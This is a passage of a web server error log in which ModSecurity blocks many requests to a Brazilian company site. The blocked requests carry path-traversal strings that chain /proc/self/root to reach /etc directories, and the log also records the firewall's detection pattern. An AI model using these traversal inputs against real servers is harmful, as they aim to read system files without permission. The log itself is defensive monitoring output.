"abh8KY6lpbStxTqkSkuKQwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:55:04.023617 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.244.31:58118] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh8ONSswJuvopo3lOiB9wAAAIg"]
[Mon Mar 16 18:55:04.949251 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:56564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8OLysWC90G-1nBrBmrAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:55:15.033424 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:56578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8Q1ajLEzk2WiQ-100WAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:55:18.630390 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:37278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8Rkr9dMAiw-8KANNqtQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:55:32.365482 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:36676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8VI6lpbStxTqkSkuKVQAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:55:38.645106 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:60410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8WrysWC90G-1nBrBmyQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:55:43.262116 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:33614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8X7ysWC90G-1nBrBm0gAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:55:47.298976 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:43118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8Y6QpVkWug9HeOt9VpQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:55:49.963900 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:40822] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8ZI6lpbStxTqkSkuKWQAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:55:49.998707 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:39260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8ZbABkC4fWIHEf8EaDgAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:56:14.603849 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:40828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8frABkC4fWIHEf8EaLAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:56:15.858640 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:42550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8f7ABkC4fWIHEf8EaLgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:56:22.459231 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:42554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8ho6lpbStxTqkSkuKYQAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:56:40.479438 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.241.46:49506] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8mEr9dMAiw-8KANNq3QAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:51.706937 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:33208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8oo6lpbStxTqkSkuKaAAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:53.042963 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:44734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8paTCbgAP5jq5TehMzgAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:54.262220 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:44736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8prysWC90G-1nBrBnPQAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:55.539807 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:44744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8p7ABkC4fWIHEf8EaOgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:56.826763 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:44760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8qLysWC90G-1nBrBnQwAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:58.013971 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:50500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8qkr9dMAiw-8KANNq7QAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:56:59.148155 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:50514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8q0r9dMAiw-8KANNq7wAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:00.442083 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:50518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8rNSswJuvopo3lOiCAAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
